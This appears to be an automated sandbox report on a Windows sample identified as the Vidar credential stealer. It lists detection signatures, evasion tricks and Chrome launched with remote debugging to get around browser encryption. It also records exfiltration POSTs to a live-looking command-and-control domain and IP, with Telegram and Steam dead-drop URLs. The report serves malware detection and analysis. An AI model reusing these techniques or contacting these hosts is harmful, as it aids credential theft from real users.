Windows Analysis Report
random(2).exe

Overview

General Information

Sample name: random(2).exe
Analysis ID: 1643067
MD5: 5e941e7c271e85093cb8344fb7cab50b
SHA1: 7a1f977cfd43da7dec3acfd45fcfea91f3acb76c
SHA256: 51c583db2595a3aefa45efaa70c8f0cc1394c18549746bc9fe654fedb9d17e57
Tags: 176-113-115-7, exe, user-JAMESWT_MHT
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

[Classification chart. Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious]
  • System is w10x64
  • random(2).exe (PID: 6980 cmdline: "C:\Users\user\Desktop\random(2).exe" MD5: 5E941E7C271E85093CB8344FB7CAB50B)
    • chrome.exe (PID: 7804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 8048 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2296,i,9997688068787143346,17471011568796092826,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2464 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 3436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 4968 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 1532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 4056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| Process Memory Space: random(2).exe PID: 6980 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| Process Memory Space: random(2).exe PID: 6980 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |

              System Summary

              Source: Process started | Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\random(2).exe", ParentImage: C:\Users\user\Desktop\random(2).exe, ParentProcessId: 6980, ParentProcessName: random(2).exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7804, ProcessName: chrome.exe
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-03-19T14:00:17.957230+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 78.47.63.132 | 443 | 192.168.2.10 | 49685 | TCP |
| 2025-03-19T14:00:20.590469+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 78.47.63.132 | 443 | 192.168.2.10 | 49686 | TCP |
| 2025-03-19T14:00:20.590290+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.10 | 49686 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:00:28.067428+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49694 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:16.338105+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49699 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:16.739083+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49700 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:17.804395+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49701 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:19.840485+0100 | 2059331 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49702 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:16.739083+0100 | 2859636 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49700 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:17.804395+0100 | 2859636 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49701 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:02:19.840485+0100 | 2859636 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49702 | 78.47.63.132 | 443 | TCP |
| 2025-03-19T14:00:14.506040+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49683 | 78.47.63.132 | 443 | TCP |

              AV Detection

              Source: random(2).exe | Avira: detected
              Source: random(2).exe | Virustotal: Detection: 50%
              Source: random(2).exe | ReversingLabs: Detection: 58%
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
              Source: random(2).exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.10:49681 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.10:49682 version: TLS 1.2
              Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
              Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
              Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
              Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
              Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
              Source: C:\Users\user\Desktop\random(2).exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
              Source: chrome.exe | Memory has grown: Private usage: 1MB later: 38MB

              Networking

              Source: Network traffic | Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.10:49683 -> 78.47.63.132:443
              Source: Network traffic | Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.10:49686 -> 78.47.63.132:443
              Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49700 -> 78.47.63.132:443
              Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.10:49700 -> 78.47.63.132:443
              Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49694 -> 78.47.63.132:443
              Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49702 -> 78.47.63.132:443
              Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.10:49702 -> 78.47.63.132:443
              Source: Network traffic | Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 78.47.63.132:443 -> 192.168.2.10:49686
              Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49699 -> 78.47.63.132:443
              Source: Network traffic | Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49701 -> 78.47.63.132:443
              Source: Network traffic | Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.10:49701 -> 78.47.63.132:443
              Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 78.47.63.132:443 -> 192.168.2.10:49685
              Source: global traffic | HTTP traffic detected: GET /g_etcontent HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
              Source: Joe Sandbox View | IP Address: 149.154.167.99
              Source: Joe Sandbox View | IP Address: 78.47.63.132
              Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
              Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0 | Host: y.p.formaxprime.co.uk | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiKo8sBCIWgzQEI/aXOAQiB1s4BCMHYzgEIydzOAQjg4M4BCOXjzgEIr+TOAQjI5M4BCN/kzgEIi+XOAQiO5c4B | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiKo8sBCIWgzQEI/aXOAQiB1s4BCMHYzgEIydzOAQjg4M4BCOXjzgEIr+TOAQjI5M4BCN/kzgEIi+XOAQiO5c4B | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /async/newtab_promos HTTP/1.1 | Host: www.google.com | Connection: keep-alive | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | Sec-Fetch-Storage-Access: active | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
              Source: global traffic | DNS traffic detected: DNS query: t.me
              Source: global traffic | DNS traffic detected: DNS query: y.p.formaxprime.co.uk
              Source: global traffic | DNS traffic detected: DNS query: www.google.com
              Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----90r90zuknop8ym7qiwbs | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0 | Host: y.p.formaxprime.co.uk | Content-Length: 256 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: wt26ph.0.drString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
              Source: wt26ph.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: chrome.exe, 0000000C.00000002.6598026417.00003CCC00550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
              Source: chrome.exe, 0000000C.00000003.2420626371.00003CCC01898000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2420162161.00003CCC01848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2420798445.00003CCC017AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.google.com/icons?selected=Material
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic/intro?20
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic2
              Source: chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
              Source: chrome.exe, 0000000C.00000003.2376583988.00003CC8005DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
              Source: chrome.exe, 0000000C.00000003.2376583988.00003CC8005DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
              Source: chrome.exe, 0000000C.00000003.2376583988.00003CC8005DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Pre
              Source: chrome.exe, 0000000C.00000003.2376965313.00003CC8005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
              Source: chrome.exe, 0000000C.00000002.5771387251.00003CCC00004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
              Source: wt26ph.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
              Source: chrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/gen204
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
              Source: chrome.exe, 0000000C.00000002.5805027972.00003CCC00068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
              Source: chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
              Source: chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
              Source: chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
              Source: chrome.exe, 0000000C.00000002.6005702865.00003CCC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
              Source: chrome.exe, 0000000C.00000003.2414667869.00003CCC00B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
              Source: chrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2418998130.00003CCC0174C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/calendar/
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://people.googleapis.com/
              Source: chrome.exe, 0000000C.00000002.6598026417.00003CCC00550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
              Source: chrome.exe, 0000000C.00000002.5864508558.00003CCC0011C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5817119523.00003CCC00094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
              Source: chrome.exe, 0000000C.00000002.6206613229.00003CCC002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.google.cmanager.com
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199832267488
              Source: random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199832267488dqu220Mozilla/5.0
              Source: random(2).exe, 00000000.00000003.1079632033.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079609497.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/g_etcontent
              Source: random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/g_etcontentdqu220Mozilla/5.0
              Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
              Source: random(2).exe, 00000000.00000003.1079632033.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1096240844.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1110484696.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1079632033.0000000000BB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
              Source: wt26ph.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: chrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
              Source: chrome.exe, 0000000C.00000002.5871320655.00003CCC00128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
              Source: chrome.exe, 0000000C.00000002.6585183116.00003CCC0053D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
              Source: chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
              Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: wt26ph.0.drString found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
              Source: random(2).exe, 00000000.00000003.1079632033.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.2325141904.0000000005538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk
              Source: random(2).exe, 00000000.00000003.1096240844.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1110484696.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://y.p.formaxprime.co.uk/
